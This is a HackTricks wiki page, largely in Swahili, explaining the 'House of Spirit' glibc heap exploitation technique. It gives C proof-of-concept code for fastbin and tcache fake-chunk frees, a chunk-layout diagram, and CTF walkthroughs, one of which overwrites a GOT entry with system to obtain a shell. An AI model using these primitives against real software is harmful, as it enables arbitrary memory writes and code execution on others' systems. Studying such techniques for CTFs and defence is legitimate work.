House of Spirit

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Taarifa za Msingi

Msimbo

House of Spirit ```c #include #include #include #include

// Code altered to add som prints from: https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit

struct fast_chunk { size_t prev_size; size_t size; struct fast_chunk *fd; struct fast_chunk *bk; char buf[0x20]; // chunk falls in fastbin size range };

int main() { struct fast_chunk fake_chunks[2]; // Two chunks in consecutive memory void *ptr, *victim;

ptr = malloc(0x30);

printf(“Original alloc address: %p\n”, ptr); printf(“Main fake chunk:%p\n”, &fake_chunks[0]); printf(“Second fake chunk for size: %p\n”, &fake_chunks[1]);

// Passes size check of “free(): invalid size” fake_chunks[0].size = sizeof(struct fast_chunk);

// Passes “free(): invalid next size (fast)” fake_chunks[1].size = sizeof(struct fast_chunk);

// Attacker overwrites a pointer that is about to be ‘freed’ // Point to .fd as it’s the start of the content of the chunk ptr = (void *)&fake_chunks[0].fd;

free(ptr);

victim = malloc(0x30); printf(“Victim: %p\n”, victim);

return 0; }

</details>

### Lengo

- Kuwa na uwezo wa kuongeza anwani ndani ya tcache / fast bin ili baadaye iwezekane ku-allocate

### Mahitaji

- Shambulio hili linahitaji mshambuliaji kuwa na uwezo wa kuunda fake fast chunks mbili ambazo zinaonyesha kwa usahihi thamani ya size, na baadaye kuweza free fake chunk ya kwanza ili iingie kwenye bin.
- Kwa **tcache (glibc ≥2.26)** shambulio ni rahisi zaidi: fake chunk moja tu inahitajika (hakuna next-chunk size check inayofanywa kwenye tcache path) mradi tu fake chunk iko 0x10-aligned na size field yake iko ndani ya tcache bin halali (0x20-0x410 on x64).

### Shambulio

- Tengeneza fake chunks zinazopitisha security checks: utahitaji fake chunks 2 zinazoweka sizes sahihi kwenye positions sahihi
- Kwa namna fulani, fanikisha free ya fake chunk ya kwanza ili iingie kwenye fast au tcache bin, kisha i-allocate ili ku-overwrite anwani hiyo

**Msimbo kutoka kwa** [**guyinatuxedo**](https://guyinatuxedo.github.io/39-house_of_spirit/house_spirit_exp/index.html) **ni mzuri kuelewa attack.** Ingawa schema hii kutoka kwenye code inaiweka kwa muhtasari vizuri:

<details>
<summary>Mpangilio wa Fake chunk</summary>
```c
/*
this will be the structure of our two fake chunks:
assuming that you compiled it for x64

+-------+---------------------+------+
| 0x00: | Chunk # 0 prev size | 0x00 |
+-------+---------------------+------+
| 0x08: | Chunk # 0 size      | 0x60 |
+-------+---------------------+------+
| 0x10: | Chunk # 0 content   | 0x00 |
+-------+---------------------+------+
| 0x60: | Chunk # 1 prev size | 0x00 |
+-------+---------------------+------+
| 0x68: | Chunk # 1 size      | 0x40 |
+-------+---------------------+------+
| 0x70: | Chunk # 1 content   | 0x00 |
+-------+---------------------+------+

for what we are doing the prev size values don't matter too much
the important thing is the size values of the heap headers for our fake chunks
*/

Tip

Kumbuka kwamba ni lazima kuunda chunk ya pili ili kuepuka baadhi ya ukaguzi wa uhalali.

Tcache house of spirit (glibc ≥2.26)

  • Katika glibc za kisasa, tcache fast-path huita tcache_put kabla ya kuthibitisha ukubwa wa chunk ifuatayo/prev_inuse, hivyo fake chunk ya sasa pekee inapaswa kuonekana sawa.
  • Mahitaji:
  • Fake chunk inapaswa kuwa 16-byte aligned na isiwekwe alama IS_MMAPPED/NON_MAIN_ARENA.
  • size lazima iwe katika tcache bin na ijumuishwe na prev_inuse bit set (size | 1).
  • Tcache kwa bin hiyo haipaswi kuwa imejazwa (default max 7 entries).
  • Minimal PoC (stack chunk):
unsigned long long fake[6] __attribute__((aligned(0x10)));
// chunk header at fake[0]; usable data starts at fake+2
fake[1] = 0x41;              // fake size (0x40 bin, prev_inuse=1)
void *p = &fake[2];          // points inside fake chunk
free(p);                     // goes straight into tcache
void *q = malloc(0x30);      // returns stack address fake+2
  • Safe-linking si kizuizi hapa: pointer ya mbele iliyohifadhiwa katika tcache imekufuliwa kwa otomatiki kama fd = ptr ^ (heap_base >> 12) wakati wa free, hivyo mshambuliaji hahitaji kujua key anapotumia single fake chunk.
  • Variant hii inafaa wakati glibc hooks zimetolewa (≥2.34) na unataka fast arbitrary write au ku-overlap target buffer (mfano, stack/BSS) na tcache chunk bila kuunda uharibifu zaidi.

Examples

  • CTF https://guyinatuxedo.github.io/39-house_of_spirit/hacklu14_oreo/index.html

  • Libc infoleak: Via an overflow inawezekana kubadilisha pointer ili iende kwenye anwani ya GOT ili leak anwani ya libc kupitia action ya read ya CTF

  • House of Spirit: Kutumia counter inayohesabu idadi ya “rifles” inawezekana kuunda fake size ya fake chunk ya kwanza, kisha kwa kutumia “message” inawezekana kufake size ya pili ya chunk na hatimaye kwa kutumia overflow inawezekana kubadilisha pointer itakayofunguliwa ili fake chunk yetu ya kwanza ifunguliwe. Kisha, tunaweza ku-allocate hiyo na ndani yake kutakuwa na anwani ya mahali “message” imehifadhiwa. Kisha, inawezekana kufanya hili liashirie entry ya scanf ndani ya GOT table, hivyo tunaweza overwrite na anwani ya system. Muda unaofuata scanf itakapoitwa, tunaweza kutuma input "/bin/sh" na kupata shell.

  • Gloater. HTB Cyber Apocalypse CTF 2024

  • Glibc leak: Uninitialized stack buffer.

  • House of Spirit: Tunaweza kubadilisha index ya kwanza ya global array ya heap pointers. Kwa urekebishaji wa single byte, tunatumia free kwenye fake chunk ndani ya chunk halali, ili tupate overlapping chunks baada ya ku-allocate tena. Kwa hiyo, simple Tcache poisoning attack inafanya kazi kupata arbitrary write primitive.

References

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks